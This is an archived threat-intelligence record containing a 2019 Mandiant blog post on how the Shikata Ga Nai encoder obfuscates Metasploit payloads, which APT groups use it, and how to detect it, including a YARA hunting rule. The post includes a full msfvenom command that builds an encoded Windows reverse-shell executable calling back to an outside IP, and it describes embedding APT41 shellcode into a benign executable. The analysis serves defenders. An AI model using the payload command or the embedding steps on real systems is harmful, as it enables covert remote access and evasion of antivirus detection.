{ "id": "82ebe155-e801-4fe3-a032-5b1dd4a61d07", "created_at": "2026-04-06T00:15:43.606602Z", "updated_at": "2026-04-10T03:36:37.161409Z", "deleted_at": null, "sha1_hash": "93936d0ec80233d04351e44d243f2e34fa35d0af", "title": "Shikata Ga Nai Encoder Still Going Strong | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3140582, "plain_text": "Shikata Ga Nai Encoder Still Going Strong | Mandiant\r\nBy Mandiant\r\nPublished: 2019-10-21 · Archived: 2026-04-02 11:17:19 UTC\r\nWritten by: Steve Miller, Evan Reese, Nick Carr\r\nOne of the most popular exploit frameworks in the world is Metasploit. Its vast library of pocket exploits,\r\npluggable payload environment, and simplicity of execution makes it the de facto base platform. Metasploit is\r\nused by pentesters, security enthusiasts, script kiddies, and even malicious actors. It is so prevalent that its user\r\nbase even includes APT threat actors, as we will demonstrate later in the blog post.\r\nDespite Metasploit’s over 15 year existence, there are still core techniques that go undetected, allowing malicious\r\nactors to evade detection. One of these core techniques is the Shikata Ga Nai (SGN) payload encoding scheme.\r\nModern detection systems have improved dramatically over the last several years and will often catch plain vanilla\r\nversions of known malicious methods. In many cases though, if a threat actor knows what they are doing they can\r\nslightly modify existing code to bypass detection.\r\nBefore we jump into how SGN works we’ll give a little background knowledge surrounding it. When threat actors\r\nplan to attack systems, they go through an assessment process of risk and reward. They cycle through questions of\r\nstealth and attribution. Some of these questions include: How much effort do I need to put into not getting caught?\r\nWhat happens if I get caught? How long can I reasonably evade detection? Will the discovery of my presence be\r\nattributed back to me? One such way APT actors have attempted to elude detection in the first place has been via\r\nencoding.\r\nWe know shellcode is primarily a set of instructions designed to manipulate execution of a program in ways not\r\noriginally intended. The goal is to inject this shellcode into a vulnerable process. To manually create shellcode,\r\none can pull the opcodes from machine code directly or pull them from an assembler/disasembler tool such as\r\nMASM (Microsoft Macro Assembler). Raw generated opcodes often will not execute out of the box. They often\r\nrequire being touched up and made compatible with the processor they are executed on and the programming\r\nlanguage they are being used for. An encoding scheme such as SGN takes care of these incompatibilities. Also,\r\nshellcode in a non-obfuscated state can be readily recognizable via static detection techniques. SGN provides\r\nobfuscation and at a first glance, randomness in the obfuscation of the shellcode.\r\nMetasploit’s default configuration encodes all payloads. While Metasploit contains a variety of encoders, the most\r\npopular has been SGN. The phrase SGN in the Japanese language means “nothing can be done”. It was given this\r\nname as at the time it was created traditional anti-virus products had difficulty with detection. As mentioned, some\r\nAV vendors are now catching vanilla implementations, but miss slightly modified variants.\r\nSGN is a polymorphic XOR additive feedback encoder. It is polymorphic in that each creation of encoded\r\nshellcode is going to be different from the next. It accomplishes this through a variety of techniques such as\r\ndynamic instruction substitution, dynamic block ordering, randomly interchanging registers, randomizing\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 1 of 11\n\ninstruction ordering, inserting junk code, using a random key, and randomization of instruction spacing between\r\nother instructions. The XOR additive feedback piece in this case refers to the fact the algorithm is XORing future\r\ninstructions via a random key and then adding that instruction to the key to be used again to encode the next\r\ninstruction. Decoding the shellcode is a process of following the steps in reverse.\r\nCreating an SGN Encoded Payload\r\nThe following steps can be recreated with Metasploit and your choice of debugging/disassembly tools:\r\n1. First create a plain vanilla SGN encoded payload:\r\nmsfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.169.0.36 LPORT=80 -b\r\n\"\\x00\" -e x86/shikata_ga_nai -f exe -o /root/Desktop/metasploit/IamNotBad.exe\r\n2. Open the file in a disassembler. Upon looking at the binary in a disassembler, you first notice a great deal\r\nof junk instructions (Figure 1). Also, Metasploit by default does not set the memory location of the code\r\n(.text section in this case) as writable. This will need to be set, otherwise the shellcode will not run.\r\nFigure 1: Junk instructions when viewing the binary in a disassembler\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 2 of 11\n\nFigure 2: RWX Flag = E0000020\r\nFigure 3: Skip the junk code and go directly to the algorithm, which can be done by inserting a jump instruction\r\nAlgorithm Breakdown\r\nThe algorithm consists of:\r\n1. Initialization key specification.\r\n2. Retrieve a location relative to EIP (so that we can modify instructions moving forward based on the\r\naddress obtained)\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 3 of 11\n\nMetasploit commonly uses the fstenv/fnstenv instructions to put it on the stack where it can be\r\npopped into a register for use. There are other ways to get EIP if wanted.\r\n3. Go through a loop to decode other instructions (by default encoded instructions will all resides in the .text\r\nsection)\r\nVanilla SGN zeroes out the register to be used as the counter and explicitly moves the counter value\r\ninto the register, so the loop portion is obvious. The loop instruction is encoded so you won’t see it\r\nuntil decoding has gone far enough.\r\nSGN decodes instructions at a higher memory address (it could do lower addresses if it wanted to\r\nfor more trickery). This is done by adding a value to the stored address from before (the one relative\r\nto EIP) and XORing it with the key. In the example that follows you see the instruction XOR\r\n[eax+18h], esi t .text:00408B98.\r\nThe address from earlier (the one relative to EIP) is then modified and the key may also be modified\r\n[Metasploit by default usually adds or subtracts an instruction value somewhere relative to the\r\naddress stored from before (the one relative to EIP)].\r\nThe loop continues until all instructions are decoded and then it moves execution to the decoded\r\nshellcode. In this case the reverse shellcode.\r\n4. As a side note, Shikata Ga Nai allows for multiple iterations. If multiple iterations are chosen, steps 1 to 3\r\nare repeated after the completion of the current iteration.\r\nAs you can see from each of the aforementioned steps, if you’re a defender and solely relying on static detection,\r\ndetection can be quite difficult. With something encoded like this, it is difficult to statically detect the specific\r\nmalicious behavior without unrolling the encoded instructions. Constantly scanning memory is computationally\r\nexpensive, making it less feasible. This leaves most detection platforms relying on the option of detecting via\r\nbehavioral indicators or sandboxes.\r\nFigure 4: Code before decoding\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 4 of 11\n\nFigure 5: Instructions being decoded\r\nFor many of those that have been in cyber security for a while, this is not new. What is still relevant though is the\r\nfact that many malicious payloads encoded with SGN are still making it past defenses and still being used by\r\nthreat actors. We noticed SGN encoded payloads still making it onto systems and we decided to investigate\r\nfurther. The results were both rewarding and surprising and led to additional detection methods discussed in the\r\n“Detection” section. It also gave us more awareness as to the extent SGN was still being used. The following is an\r\nexample of a payload we recovered from an APT actor.\r\nEmbedding a Payload\r\nFor this example, we used an existing APT41 sample and embedded the payload into a benign PE. This APT41\r\nsample is shellcode that is Shikata Ga Nai encoded.\r\nMD5: def46c736a825c357918473e3c02b3ef\r\nWe will take a benign PE we created (ImNotBad.exe) and we will embed the APT41 sample to show SGN in\r\naction. We create a new section called NewSec and set the section values appropriately.\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 5 of 11\n\nFigure 6: Calculate the size of the shell code. Start address 12000 and End Address 94C10. Make sure the size is\r\nwithin data that is there. The difference is 82c10.\r\nFigure 7: Insert the shell code into the benign PE (ImNotBad.exe)\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 6 of 11\n\nFigure 8: The embedded shell code can be found in the code\r\nFigure 9: Patch the code to jump to it\r\nFigure 10: Here are the four steps from the Shikata Ga Nai algorithm (mentioned previously) demonstrated\r\nIn Figure 11 and Figure 12, as the first set of instructions are decoded it appears it is attempting to avoid normal\r\nexecution. EA 25 D9 74 24 F4 BB =\u003e Note how the EA and 25 are inserted to cause code to crash (jumping to a\r\ncurious spot in the code). Further effort was not applied to investigate the crash correctly, but when patching the\r\ncode with nops, it executes the next decode sequence.\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 7 of 11\n\nFigure 11: Set of instructions are decoded it appears it is attempting to avoid normal execution\r\nFigure 12: Set of instructions are decoded it appears it is attempting to avoid normal execution\r\nDetection\r\nDetecting SGN encoded payloads can be difficult as a defender, especially if static detection is heavily relied\r\nupon. Decoding and unraveling the encoded instructions is necessary to identify the intended malicious purposes.\r\nConstantly scanning memory is computationally expensive, making it less feasible. This leaves most detection\r\nplatforms relying on detection via behavioral indicators and sandboxes. FireEye appliances contain both static and\r\ndynamic detection components. Detection is achieved by a variety of engines, including FireEye's machine\r\nlearning engine, MalwareGuard. The numerous engines within FireEye appliances serve specific purposes and\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 8 of 11\n\nhave different strengths and weaknesses. Creating detection around these various engines allows FireEye to utilize\r\neach of their strengths. Correlating activity between these engines allows for unique detection opportunities. This\r\nalso allows for production detections that would otherwise not be possible when relying on a single engine for\r\ndetection. We were able to create production detections correlating the different engines on the FireEye appliances\r\nto detect SGN encoded binaries with a high fidelity. The current production detections take advantage of static,\r\ndynamic and machine learning engines within the FireEye appliance.\r\nAs an example of the complications concerned with detecting SGN, we will construct code encoded with a\r\nslightly modified version of Metasploit’s plain SGN algorithm (Figure 13):\r\nFigure 13: Example code for possible static detection\r\nOne of the keys to writing a good static detection rule is recognizing the unique malicious behaviors of what you\r\nare trying to detect. Next, being able to capture as much of that behavior without causing false positives (FPs).\r\nEarlier in the post we listed the core behaviors of the SGN algorithm. For sake of illustration, let’s try to match on\r\nsome of those behaviors. We’ll attempt to match on the key, the mechanism used to get EIP, and the XOR additive\r\nfeedback loop.\r\nIf we were trying to detect the code in Figure 13 statically, we could use the open source tool Yara. As a first pass\r\nwe could construct the following rule (Figure 14):\r\nFigure 14: Example SGN YARA static detection rule for the code in Figure 13\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 9 of 11\n\nIn the rule in Figure 14 we have added padding bytes to try and thwart an attacker that would insert junk\r\ninstructions. If an adversary realized what we were matching on it could be easily defeated by inserting junk code\r\nbeyond our padding. We could play the game of cat and mouse and continue to increase our padding based on\r\nwhat we saw, but this is not a good solution. In addition, as we pad more bytes out, the rule becomes more FP\r\nprone. Besides adding junk code, other obvious evasion techniques an attacker could use include: using different\r\nregisters, performing arithmetic operations to obtain values or reordering instructions. Metasploit does a decent\r\njob randomizing the algorithm with these things which makes static detection more difficult. As we try to catch\r\neach modified version it could be never-ending.\r\nStatic detection is a useful technique, but very limited. If this is all you rely on, you will miss much of the\r\nmalicious behavior getting onto your systems. For SGN, we studied it further and identified the core behavioral\r\npieces. We saw how it was still being used by modern malware. The following is an example hunting rule that can\r\nbe used to detect some of the current common permutations created by vanilla x86-SGN in Metasploit. This rule\r\ncan be further expanded upon to include additional logic if desired.\r\nrule Hunting_Rule_ShikataGaNai\r\n{\r\n meta:\r\n author = \"Steven Miller\"\r\n strings:\r\n $varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C\r\n $varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B\r\n $varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C\r\n $varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C\r\n $varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B\r\n $varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C\r\n $varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C\r\n $varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B\r\n $varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C\r\n $varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C\r\n $varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B\r\n $varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C\r\n condition:\r\n any of them\r\n}\r\nThoughts\r\nMetasploit is used by many different people for many different reasons. Some may use Metasploit for legitimate\r\npurposes such as red team engagements, research or educational tasks, while others may use the framework with a\r\nmalicious intent. In the latter category, FireEye has historically observed APT20, a suspected Chinese nation state\r\nsponsored threat group, utilize Metasploit with SGN encoded payloads. APT20 is one of the many named threat\r\ngroups that FireEye tracks. This group has a primary focus on stealing data, specifically intellectual properties.\r\nOther named groups include APT41 and FIN6. APT41 was formally disclosed by FireEye Intelligence earlier this\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 10 of 11\n\nyear. This group has utilized SGN encoded payloads within custom developed backdoors. APT41 is a Chinese\r\ncyber threat group that has been observed carrying out financially motivated missions coinciding with cyber-espionage operations. Financial threat group FIN6 has also used SGN encoded payloads to carry out their\r\nmissions, and they have historically relied upon various publicly available tools. These missions largely involve\r\ntheft of payment card data from point-of-sale systems. FireEye has also observed numerous uncategorized threat\r\ngroups utilizing payloads encoded with SGN. These are groups that FireEye tracks internally, but have not been\r\nannounced formally. One of these groups in particular is UNC902, which is largely known as the financially\r\nmotivated group TA505 in public threat reports. FireEye has observed UNC902 extensively use SGN encoding\r\nwithin their payloads and we continue to see activity related to this group, even as recently as October 2019.\r\nOutside of these groups, we continue to observe usage of SGN encoding within malicious samples. FireEye\r\ncurrently identifies hundreds of SGN encoded payloads on a monthly basis. SGN encoded payloads are not always\r\nused with the same intent, but this is one side effect of being embedded into such a popular and freely available\r\nframework. Looking forward, we expect to see continued usage of SGN encoded payloads.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nhttps://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html" ], "report_names": [ "shikata-ga-nai-encoder-still-going-strong.html" ], "threat_actors": [ { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "6728f306-6259-4e7d-a4ea-59586d90a47d", "created_at": "2023-01-06T13:46:39.175292Z", "updated_at": "2026-04-10T02:00:03.236282Z", "deleted_at": null, "main_name": "FIN11", "aliases": [ "TEMP.Warlock", "UNC902" ], "source_name": "MISPGALAXY:FIN11", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5d512e7c-f6a7-47b5-b440-4968c299deaf", "created_at": "2023-01-06T13:46:38.344772Z", "updated_at": "2026-04-10T02:00:02.9359Z", "deleted_at": null, "main_name": "APT20", "aliases": [ "VIOLIN PANDA", "TH3Bug", "Crawling Taurus" ], "source_name": "MISPGALAXY:APT20", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434543, "ts_updated_at": 1775792197, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/93936d0ec80233d04351e44d243f2e34fa35d0af.pdf", "text": "https://archive.orkl.eu/93936d0ec80233d04351e44d243f2e34fa35d0af.txt", "img": "https://archive.orkl.eu/93936d0ec80233d04351e44d243f2e34fa35d0af.jpg" } }